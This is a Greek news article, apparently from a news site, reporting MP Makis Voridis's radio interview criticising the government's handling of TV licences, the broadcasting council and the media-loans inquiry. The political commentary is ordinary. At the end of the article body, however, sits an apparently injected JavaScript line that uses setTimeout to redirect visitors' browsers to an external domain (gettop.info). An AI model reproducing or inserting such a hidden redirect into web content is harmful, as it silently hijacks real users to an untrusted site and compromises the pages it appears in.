Βορίδης: Θεσμική εκτροπή μεγίστου μεγέθους η μη αναμονή της απόφασης του ΣτΕ

0
6

 

«Από τη στιγμή που πια κρίθηκαν παραδεκτές οι προσφυγές και επομένως το Συμβούλιο θα μπει στην εξέταση της ουσίας της αντισυνταγματικότητας, η κυβέρνηση θα περιμένει την απόφαση του ΣτΕ και δεν θα κάνει καμία άλλη ενέργεια», τόνισε ο βουλευτής της Νέας Δημοκρατίας, Μάκης Βορίδης, σε συνέντευξή του στον ΒΗΜΑ FM, επισημαίνοντας πως η μη αναμονή της απόφασης ισοδυναμεί με θεσμική εκτροπή μεγίστου μεγέθους.

Για την απόφαση του ΣτΕ για τις τηλεοπτικές άδειες ο κ. Βορίδης επεσήμανε: «Από τη στιγμή που πια κρίθηκαν παραδεκτές οι προσφυγές και επομένως το Συμβούλιο θα μπει στην εξέταση της ουσίας της αντισυνταγματικότητας, η κυβέρνηση θα περιμένει την απόφαση του ΣτΕ και δεν θα κάνει καμία άλλη ενέργεια. Το να προχωρήσει μία τέτοια τροπολογία, αντιλαμβάνεστε το μέγεθος της περιφρόνησης πια, της δικαστικής διαδικασίας. Σε τέτοιες υποθέσεις, που διακυβεύονται ζητήματα ελευθεροτυπίας αλλά και 2.000 θέσεις εργασίας, είσαι υποχρεωμένος να περιμένεις όποτε εκδοθεί η απόφαση. Το να μην περιμένεις 20 μέρες, εδώ πια φτάνουμε στα όρια της σκληρής εμπάθειας και της απόπειρας διαμορφώσεως τετελεσμένων, προκειμένου να επηρεαστεί η κρίση του δικαστηρίου. Αυτό είναι πολιτική αθλιότητα μεγίστου μεγέθους. Το αποτέλεσμα της διασκέψεως θα είναι γνωστό την Τετάρτη. Άρα λοιπόν δεν είναι δυνατόν να λέει κάποιος ότι εμένα δεν με ενδιαφέρει, εγώ θα προχωρήσω. Αυτό είναι θεσμική εκτροπή μεγίστου μεγέθους και δείχνει την εμπάθεια και την κακότητα, η οποία πλέον, μην κοροϊδευόμαστε, δεν στοχεύει σε καμία τακτοποίηση οποιουδήποτε τηλεοπτικού τοπίου. Και είναι και η απόπειρά της, η οποία καθίσταται απέλπιδα όλο και περισσότερο, προκειμένου να παρέμβει στο τηλεοπτικό τοπίο».

Όσον αφορά στη συγκρότηση του ΕΣΡ, ο κ. Βορίδης υπογράμμισε: «Μην λέμε τώρα κουταμάρες, δεν υπάρχουν 258 εκατ., υπάρχει το 1/3 του ποσού το οποίο έχει καταβληθεί. Τα υπόλοιπα, θα καταβληθούν. Και θα καταβληθούν, ίσως. Αυτά σου συμβαίνουν όταν δεν σέβεσαι τη Δικαιοσύνη. Αυτή είναι η αλήθεια, θα μπορούσες να έχεις περιμένει. Θα πρέπει να αποδοθούν οι αρμοδιότητες στο ΕΣΡ… Τότε και θα συγκροτηθεί (το ΕΣΡ) και θα αποφασίσει για τον αριθμό των αδειών και θα γίνει διαγωνιστική διαδικασία. Από αυτήν πάλι, κάτι θα προκύψει. Ένα όφελος για το Δημόσιο. Η κυβέρνηση έχει το νομικό δικαίωμα να διαμορφώσει το θεσμικό πλαίσιο, αλλά τις αρμοδιότητες της ουσίας, την προκήρυξη, τη διαγωνιστική διαδικασία, τον αριθμό των αδειών. Αυτά θα τα καθορίσει το ΕΣΡ».

Αναφορικά με τον κ. Καλογρίτσα είπε: «Το θέμα της οριστικής αδειοδοτήσεως, συνδέεται κυρίως και πρωτίστως με την ισότιμη μεταχείριση κάποιου που ήθελε να πάρει συχνότητα και λόγω της προσωρινής αδειοδοτήσεως, δεν μπορούσε.

Υπάρχει καμιά αμφιβολία μετά τον Καλογρίτσα; Μας έχει μείνει καμία απορία γιατί έχει γίνει αυτή η ιστορία; Έχει καταλάβει κανένας γιατί οι άδειες έπρεπε να είναι 4 και δεν μπορούσαν να είναι 8; Αυτό είναι Βενεζουέλα».

Σχετικά με τηνεξεταστική επιτροπή για τα δάνεια των ΜΜΕ ο βουλευτής της ΝΔ είπε: «Ο ΣΥΡΙΖΑ τι προσπαθεί να βγάλει από την εξεταστική επιτροπή; Το περίφημο τρίγωνο της διαπλοκής. Το παλιό πολιτικό σύστημα, με τα ΜΜΕ, και τις διεφθαρμένες τράπεζες… Αυτό προσπαθεί να βγάλει. Από την εξεταστική επιτροπή, δεν έχει υπάρξει μέχρι στιγμής ούτε μία κατάθεση… ένας δεν μας έχει πει για μία πολιτική παρέμβαση. Η υπόθεση εργασίας, παραμένει υπόθεση εργασίας. Στην υπόθεσή σου, τη θεωρία σου, την κρατάς ως θεωρία. Επαληθεύεται από τα πράγματα; Όχι». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here